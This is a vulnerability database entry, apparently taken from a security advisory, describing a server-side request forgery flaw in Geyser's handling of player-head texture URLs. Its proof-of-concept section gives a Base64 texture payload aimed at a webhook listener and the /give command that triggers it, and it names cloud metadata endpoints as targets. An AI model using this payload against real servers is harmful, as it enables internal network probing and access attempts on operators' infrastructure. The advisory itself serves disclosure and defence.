logo

Database

Server-side request forgery (SSRF) In org.geysermc.geyser:core

Description

Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser

Summary

A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.

Details

Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.

When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution. However, the URL contained in the textures.SKIN.url field is not sufficiently validated.

PoC

    Setup Environment:

      Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.

      Ensure you have a Bedrock client connected.

    Prepare Listener:

      Go to webhook.site and obtain a unique URL (e.g., https://webhook.site/YOUR-UUID).

    Construct Payload:

      Create a JSON payload pointing to your listener URL: {"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}

      Encode this JSON string to Base64. (You can use a terminal command: echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64)

    Execute Command:

      Run the following command in the Bedrock Edition client: /give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]

    Verify:

      Check the webhook.site dashboard.

      You will see an HTTP GET request originating from the Minecraft Server's IP address, not the client's IP.

Impact

This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.

Affected Parties

    Minecraft servers running Geyser

    Server operators exposing internal or cloud metadata endpoints

Potential Impacts

    Internal network probing (e.g., intranet services, admin panels)

    Cloud metadata access attempts (e.g., 169.254.169.254)

    IP address disclosure of the Minecraft server

    Abuse of the server as an HTTP request proxy

Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:

    Network mapping

    Firewall bypass attempts

    Cloud environment fingerprinting

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. CVE-2026-421882. NVD-2026-421883. OSV-2026-421884. GHSA-xcfg-fcr5-gw9r5. GCVE-2026-42188

References

1. https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.